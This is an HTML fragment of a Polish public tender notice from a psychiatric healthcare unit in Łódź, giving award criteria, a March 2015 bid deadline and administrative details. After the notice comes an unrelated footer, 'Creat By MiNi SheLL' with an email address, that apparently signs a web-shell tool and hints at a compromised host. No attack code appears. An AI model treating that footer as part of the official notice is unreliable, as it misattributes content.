- W przypadku złożenia oferty wspólnej  wymagane jest złożenie do oferty w oryginale lub kopii poświadczonej notarialnie, pełnomocnictwa do reprezentacji w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95.00</li>
<li>2 - Termin płatności faktury - 5.00</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.babinski.home.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział zamówień publicznych i zaopatrzenia, bud. A I piętro pok. 13 w siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2015 godzina 10:00, miejsce: Specjalistyczny Psychiatryczny Zespół Opieki Zdrowotnej w Łodzi, 91-229 Łódź,  ul. Aleksandrowska 159, sekreteriat , bud. Dyrekcji , II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com